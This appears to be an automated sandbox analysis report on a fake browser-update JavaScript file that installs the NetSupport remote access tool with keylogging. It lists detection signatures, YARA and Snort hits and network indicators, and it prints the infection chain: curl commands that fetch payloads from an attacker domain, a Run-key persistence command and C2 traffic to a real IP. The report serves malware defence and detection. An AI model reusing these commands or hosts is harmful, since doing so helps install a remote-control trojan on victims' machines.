Edit tour

Windows Analysis Report
Browser_update16.0.5836.js

Overview

General Information

Sample Name:	Browser_update16.0.5836.js
Analysis ID:	1284202
MD5:	8fb80e0a6f0c305371b8dc11db0c1552
SHA1:	6a526ca78d175b5ec46fd4dd5fdc3f0591cb4eb7
SHA256:	734666652f013df6bb435fe22fdd811274efb8e09e3fef9a2495396319d1d1e5
Tags:	94-158-247-23jsnetsupport
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

JScript performs obfuscated calls to suspicious functions

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Command shell drops VBS files

Uses cmd line tools excessively to alter registry or file data

Uses known network protocols on non-standard ports

Queries the volume information (name, serial number etc) of a device

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Yara detected NetSupport remote tool

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to communicate with device drivers

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Java / VBScript file with very long strings (likely obfuscated code)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Potential key logger detected (key state polling based)

Uses reg.exe to modify the Windows registry

Found evaded block containing many API calls

Yara detected Keylogger Generic

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 3040 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Browser_update16.0.5836.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 7064 cmdline: "C:\Windows\System32\cmd.exe" /c C://ProgramData//fyAAWPXvDMiNSTKqVPpzzNr.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7088 cmdline: cmd.exe /c C:\ProgramData\sett.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

curl.exe (PID: 2448 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)

cmd.exe (PID: 5792 cmdline: cmd.exe /c C:\ProgramData\7z.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

curl.exe (PID: 5660 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)

cmd.exe (PID: 6940 cmdline: cmd.exe /c C:\ProgramData\qweq.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

curl.exe (PID: 2400 cmdline: curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)

reg.exe (PID: 5472 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 4564 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 5460 cmdline: cmd.exe /c C:\ProgramData\qweq.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

xcopy.exe (PID: 7164 cmdline: xcopy /h /y 7zz.exe C:\ProgramData\ MD5: 6BC7DB1465BEB7607CBCBD7F64007219)

cmd.exe (PID: 6736 cmdline: cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

7zz.exe (PID: 7076 cmdline: C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ MD5: 42BADC1D2F03A8B1E4875740D3D49336)

timeout.exe (PID: 4464 cmdline: TIMEOUT /T 7 MD5: EB9A65078396FB5D4E3813BB9198CB18)

cmd.exe (PID: 7036 cmdline: cmd /c C:\ProgramData\client32.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

client32.exe (PID: 2808 cmdline: C:\ProgramData\client32.exe MD5: F70B67C2B3204B7DDD8B755799CCCFF0)

reg.exe (PID: 4572 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 2108 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f MD5: E3DACF0B31841FA02064B4457D44B357)

client32.exe (PID: 2220 cmdline: "C:\ProgramData\client32.exe" MD5: F70B67C2B3204B7DDD8B755799CCCFF0)

client32.exe (PID: 6920 cmdline: "C:\ProgramData\client32.exe" MD5: F70B67C2B3204B7DDD8B755799CCCFF0)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\ProgramData\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000012.00000002.1074711959.0000000003270000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000012.00000002.1074711959.000000000325F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000012.00000000.586153494.0000000000212000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000015.00000002.607562587.0000000000212000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000014.00000002.590783573.0000000000212000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000015.00000000.606379761.0000000000212000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000012.00000002.1074264589.0000000000212000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000014.00000000.588400039.0000000000212000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: 7zz.exe PID: 7076	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: 7zz.exe PID: 7076	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 2808	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 2808	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 2220	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 2220	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 6920	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 6920	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author
18.0.client32.exe.210000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
18.2.client32.exe.738d0000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
21.0.client32.exe.210000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
21.2.client32.exe.210000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
20.2.client32.exe.210000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
20.0.client32.exe.210000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
20.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
20.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
18.2.client32.exe.73890000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
21.2.client32.exe.73890000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
20.2.client32.exe.738d0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
18.2.client32.exe.210000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
21.2.client32.exe.738d0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
18.2.client32.exe.6f990000.3.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
20.2.client32.exe.73890000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
18.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
18.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
15.3.7zz.exe.27f13f8.5.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
21.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
21.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
15.3.7zz.exe.2336d50.0.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
15.3.7zz.exe.2453790.4.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
15.3.7zz.exe.2453790.4.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
15.3.7zz.exe.23466c8.6.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
15.3.7zz.exe.2460280.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
15.3.7zz.exe.2460280.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
15.3.7zz.exe.245b908.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
15.3.7zz.exe.245b908.1.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
15.3.7zz.exe.2460280.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
15.3.7zz.exe.2460280.2.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
21.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
21.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
18.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
18.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
20.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
20.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 31 entries

Snort Signatures

ETPRO TROJAN Fake Browser Update Domain in DNS Lookup - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849448532854911 08/02/23-10:16:17.568207
SID:	2854911
Source Port:	49448
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Fake Browser Update Domain in TLS SNI - Source IP: 192.168.2.6 - Destination IP: 185.9.147.166

Timestamp:	192.168.2.6185.9.147.166497054432854914 08/02/23-10:16:17.742725
SID:	2854914
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NetSupport RAT CnC Activity - Source IP: 192.168.2.6 - Destination IP: 94.158.247.23

Timestamp:	192.168.2.694.158.247.234971050502827745 08/02/23-10:19:37.575836
SID:	2827745
Source Port:	49710
Destination Port:	5050
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 94.158.247.23Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: unknown

DNS traffic detected: queries for: magydostravel.com

Source: global traffic	HTTP traffic detected: GET /cdn/91c818ee6e9ec29f8c1.php HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: magydostravel.com
Source: global traffic	HTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?487817 HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mangoairsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: /
Source: global traffic	HTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: /
Source: global traffic	HTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: /
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 185.9.147.166:443 -> 192.168.2.4:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.4:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.4:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.4:49696 version: TLS 1.2

Source: 7zz.exe, 0000000F.00000002.573220956.000000000068A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\ProgramData\client32.exe

Code function: 18_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,

18_2_11114590

Source: Yara match	File source: 20.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.2453790.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.2460280.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.245b908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.2460280.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7zz.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\PCICL32.DLL, type: DROPPED

Source: C:\ProgramData\7zz.exe	Code function: 15_2_00403A70	15_2_00403A70
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00417BAE	15_2_00417BAE
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004442E0	15_2_004442E0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004285AD	15_2_004285AD
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00448730	15_2_00448730
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0044CA40	15_2_0044CA40
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00454B10	15_2_00454B10
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00458B30	15_2_00458B30
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00450BD0	15_2_00450BD0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00434D28	15_2_00434D28
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00460DF8	15_2_00460DF8
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00451050	15_2_00451050
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00459170	15_2_00459170
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004311FE	15_2_004311FE
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00449460	15_2_00449460
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004514F0	15_2_004514F0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004217DA	15_2_004217DA
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00441925	15_2_00441925
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0042DBB6	15_2_0042DBB6
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00459E70	15_2_00459E70
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00461EF0	15_2_00461EF0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00459F80	15_2_00459F80
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0045E0C0	15_2_0045E0C0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0046A2A0	15_2_0046A2A0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0044A440	15_2_0044A440
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0046A460	15_2_0046A460
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0044E430	15_2_0044E430
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004465E0	15_2_004465E0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0044A7E0	15_2_0044A7E0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00456830	15_2_00456830
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0046A950	15_2_0046A950
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004469A0	15_2_004469A0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004729A3	15_2_004729A3
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0045EA60	15_2_0045EA60
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00472B30	15_2_00472B30
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00472C0B	15_2_00472C0B
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00456CF0	15_2_00456CF0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00466E30	15_2_00466E30
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00447150	15_2_00447150
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00467220	15_2_00467220
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0046F314	15_2_0046F314
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00467420	15_2_00467420
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004075F5	15_2_004075F5
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00453740	15_2_00453740
Source: C:\ProgramData\7zz.exe	Code function: 15_2_004677D0	15_2_004677D0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00453CE0	15_2_00453CE0
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00467DF0	15_2_00467DF0
Source: C:\ProgramData\client32.exe	Code function: 18_2_11029BB0	18_2_11029BB0
Source: C:\ProgramData\client32.exe	Code function: 18_2_1101C110	18_2_1101C110
Source: C:\ProgramData\client32.exe	Code function: 18_2_111640E0	18_2_111640E0
Source: C:\ProgramData\client32.exe	Code function: 18_2_11168345	18_2_11168345
Source: C:\ProgramData\client32.exe	Code function: 18_2_1100892B	18_2_1100892B
Source: C:\ProgramData\client32.exe	Code function: 18_2_1115F840	18_2_1115F840
Source: C:\ProgramData\client32.exe	Code function: 18_2_1101BCD0	18_2_1101BCD0
Source: C:\ProgramData\client32.exe	Code function: 18_2_11116F30	18_2_11116F30
Source: C:\ProgramData\client32.exe	Code function: 18_2_1101CF30	18_2_1101CF30

Source: C:\ProgramData\client32.exe	Code function: String function: 11161299 appears 33 times
Source: C:\ProgramData\client32.exe	Code function: String function: 11147060 appears 107 times
Source: C:\ProgramData\client32.exe	Code function: String function: 1105E820 appears 34 times
Source: C:\ProgramData\client32.exe	Code function: String function: 11029A70 appears 328 times
Source: C:\ProgramData\client32.exe	Code function: String function: 1116FED0 appears 31 times
Source: C:\ProgramData\7zz.exe	Code function: String function: 0046B890 appears 610 times
Source: C:\ProgramData\7zz.exe	Code function: String function: 00407A18 appears 176 times

Source: C:\ProgramData\client32.exe

Code function: 18_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

18_2_1115EA00

Source: C:\ProgramData\7zz.exe

Code function: 15_2_0040BACB: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,

15_2_0040BACB

Source: Browser_update16.0.5836.js

Initial sample: Strings found which are bigger than 50

Source: C:\ProgramData\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\ProgramData\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\ProgramData\client32.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\ProgramData\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\ProgramData\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\client32.exe	Section loaded: nslsp.dll	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Browser_update16.0.5836.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//fyAAWPXvDMiNSTKqVPpzzNr.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
